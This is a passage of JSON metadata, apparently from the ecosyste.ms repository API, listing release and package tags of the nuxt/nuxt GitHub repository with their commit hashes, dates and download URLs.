.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codel